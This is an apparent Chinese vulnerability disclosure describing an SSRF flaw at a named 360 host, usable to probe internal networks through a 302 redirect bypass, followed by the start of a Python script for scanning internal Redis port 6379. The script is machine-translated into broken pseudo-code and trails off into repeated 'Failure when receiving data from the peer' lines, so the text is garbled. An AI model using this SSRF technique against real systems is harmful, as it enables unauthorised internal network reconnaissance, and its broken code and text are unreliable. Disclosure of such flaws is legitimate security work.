360某处ssrf漏洞可探测内网信息(附内网6379探测脚本)

漏洞标题 360某处ssrf漏洞可探测内网信息(附内网6379探测脚本) 相关厂商 奇虎360 漏洞作者 Sunshie 提交时间 2016-07-15 15:38 公开时间 2016-07-15 1…

漏洞标题 360某处ssrf漏洞可以检测内网信息(内部网络6379探针脚本) 相关制造商 奇虎360 漏洞作者 Sunshie 提交时间 2016-07-15 15: 38 公共时间 2016-07-15 16: 15 漏洞类型 命令执行 危险等级 高 自我评估等级 20 漏洞状态 该漏洞已通知供应商,但供应商忽略了该漏洞 标签标签 漏洞详细信息 漏洞地址:http://st.so.com

使用302绕过http协议限制 #!/usr/bin/env python # - * - 编码: utf-8 - * - #@Author: Lcy #@Date: 2016-07-05 20: 55: 30 #@ Last修改为: Lcy 导入请求 导入线程 导入队列 随机导入 进口时间 Url='http://st.so.com/stu' Threads_count=3 Que=Queue.Queue() Lock=threading.Lock() 线程=[] Ip='10 .121.3。' Def getIp(): Failure when receiving data from the peer Failure when receiving data from the peer Failure when receiving data from the peer Failure when receiving data from the peer Failure when receiving data from the peer Failure when receiving data from the peer Failure when receiving data from the peer Failure when receiving data from the peer